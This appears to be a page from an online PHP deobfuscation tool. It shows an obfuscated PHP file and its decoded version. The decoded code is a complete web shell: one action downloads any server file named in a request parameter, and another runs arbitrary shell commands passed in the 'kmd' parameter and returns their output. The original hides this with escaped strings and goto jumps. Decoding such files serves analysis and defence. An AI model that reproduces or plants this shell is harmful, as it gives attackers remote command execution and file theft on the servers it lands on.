Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto pVBm_; w0j9Q: $action = $_REQUEST["\141\x63\164\151\x6f\x6e"]; goto zPj23; zP..

Decoded Output download

<?php 
 goto pVBm_; w0j9Q: $action = $_REQUEST["action"]; goto zPj23; zPj23: if ($action == "getContent") { $path_to_file = $_REQUEST["path"]; if (file_exists($path_to_file)) { http_response_code(200); header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($path_to_file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($path_to_file)); flush(); readfile($path_to_file); die; } else { http_response_code(404); header("Content-Type: application/json"); echo json_encode(array("message" => "Path " . $path_to_file . " does not exist or is not readable.", "path" => $path_to_file)); } } elseif ($action == "3x3c") { $command = $_REQUEST["kmd"]; $descriptorspec = array(0 => array("pipe", "w"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); chdir("/"); $process = proc_open($command, $descriptorspec, $pipes); if (!is_resource($process)) { die(1); } $stdout = ''; $buffer = ''; do { $buffer = fread($pipes[1], $chunk_size); $stdout = $stdout . $buffer; } while (!feof($pipes[1]) && strlen($buffer) != 0); $stderr = ''; $buffer = ''; do { $buffer = fread($pipes[2], $chunk_size); $stderr = $stderr . $buffer; } while (!feof($pipes[2]) && strlen($buffer) != 0); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); header("Content-Type: application/json"); echo json_encode(array("stdout" => $stdout, "stderr" => $stderr, "3x3c" => $command)); } goto FqR2D; pVBm_: $chunk_size = 1024; goto w0j9Q; FqR2D: ?>

Did this file decode correctly?

Original Code

<?php
 goto pVBm_; w0j9Q: $action = $_REQUEST["\141\x63\164\151\x6f\x6e"]; goto zPj23; zPj23: if ($action == "\147\145\164\103\x6f\x6e\x74\145\156\164") { $path_to_file = $_REQUEST["\x70\x61\164\150"]; if (file_exists($path_to_file)) { http_response_code(200); header("\x43\157\x6e\x74\145\x6e\164\x2d\104\x65\163\143\x72\x69\160\x74\x69\x6f\x6e\x3a\x20\106\x69\154\145\40\x54\162\x61\156\163\x66\145\162"); header("\x43\157\156\164\145\156\x74\55\124\171\x70\x65\72\x20\141\x70\160\154\151\143\x61\164\151\157\156\57\x6f\x63\x74\145\164\x2d\163\164\x72\x65\x61\155"); header("\x43\x6f\x6e\164\x65\156\x74\x2d\x44\151\x73\160\157\x73\151\x74\151\157\156\x3a\40\141\x74\x74\141\143\x68\x6d\x65\156\164\73\x20\x66\151\x6c\145\x6e\x61\155\145\x3d\42" . basename($path_to_file) . "\42"); header("\105\x78\x70\151\162\x65\163\x3a\40\60"); header("\103\x61\x63\150\x65\55\103\x6f\x6e\x74\162\x6f\x6c\x3a\x20\x6d\x75\x73\x74\x2d\162\x65\x76\141\x6c\151\x64\x61\x74\145"); header("\120\162\x61\x67\155\x61\72\40\x70\165\x62\x6c\x69\x63"); header("\103\x6f\156\164\145\156\x74\x2d\114\x65\x6e\147\x74\x68\x3a\40" . filesize($path_to_file)); flush(); readfile($path_to_file); die; } else { http_response_code(404); header("\103\157\x6e\164\145\x6e\164\x2d\124\x79\x70\x65\72\x20\x61\160\x70\154\151\x63\x61\164\x69\x6f\x6e\x2f\x6a\x73\157\156"); echo json_encode(array("\x6d\145\163\163\x61\x67\145" => "\120\x61\164\150\40" . $path_to_file . "\x20\x64\x6f\145\163\x20\156\x6f\x74\x20\x65\x78\x69\x73\164\x20\157\x72\x20\151\163\x20\x6e\157\x74\x20\x72\145\x61\x64\x61\142\x6c\145\x2e", "\160\141\164\x68" => $path_to_file)); } } elseif ($action == "\x33\170\63\143") { $command = $_REQUEST["\x6b\x6d\x64"]; $descriptorspec = array(0 => array("\160\x69\160\x65", "\x77"), 1 => array("\160\151\x70\x65", "\x77"), 2 => array("\160\151\x70\145", "\x77")); chdir("\x2f"); $process = proc_open($command, $descriptorspec, $pipes); if (!is_resource($process)) { die(1); } $stdout = ''; $buffer = ''; do { $buffer = fread($pipes[1], $chunk_size); $stdout = $stdout . $buffer; } while (!feof($pipes[1]) && strlen($buffer) != 0); $stderr = ''; $buffer = ''; do { $buffer = fread($pipes[2], $chunk_size); $stderr = $stderr . $buffer; } while (!feof($pipes[2]) && strlen($buffer) != 0); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); header("\x43\x6f\x6e\164\x65\156\164\55\x54\171\x70\145\72\x20\141\160\x70\x6c\x69\x63\x61\164\151\157\156\57\152\163\157\156"); echo json_encode(array("\163\x74\x64\157\165\x74" => $stdout, "\163\164\144\x65\x72\162" => $stderr, "\63\x78\x33\x63" => $command)); } goto FqR2D; pVBm_: $chunk_size = 1024; goto w0j9Q; FqR2D: ?>

Function Calls

None

Variables

None

Stats

MD5 0f884be9ae149f6dabdef48f15cdd164
Eval Count 0
Decode Time 76 ms